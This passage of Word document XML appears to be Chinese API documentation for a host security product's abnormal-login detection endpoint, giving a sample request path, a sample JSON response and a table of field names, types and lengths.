            <w:r>
              <w:t>主机名（windows无该参数）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06D77EF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DDAB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/abnormallogin/linux?page=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2B646F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B8CFA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签b"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oldtcm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1523262390,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "湖北武汉",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>evilIpDb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackSuccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormalLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormalTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A028DD6"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968"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3181"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="60423B4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F081A9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F1EB00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD14367" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A13AF8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="06081CF1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67E87C8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CFE95FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DCD25A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3229BB6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63850FBB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="004B02F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58BCDCFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60770FBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52A37324" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="705BB89A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B9691B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E01E111" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4923FBC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047DFCE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FCE14A7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09C5DCDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B6D9F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FD382E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605108DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3551280C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FFB02A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA11B5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA33A5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2702E67E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E6D5145" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="057A17A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37E9F321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2520F8D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF6AD8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47786F38" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62D38387" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6769CC79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D63684" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F649C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="143C5160" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="724F85B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC9BD88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2978F495" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="204BBA71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C3858F7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="690A9EEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="577FB5C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596D584D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E166FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7491D692" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B9D4E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C2934E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33DE4D7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="724FA5A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7249DB5E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19E18B2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA481ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E195FBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E7A3B83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63B88CD9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="167189A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB9AF4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A86A6DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
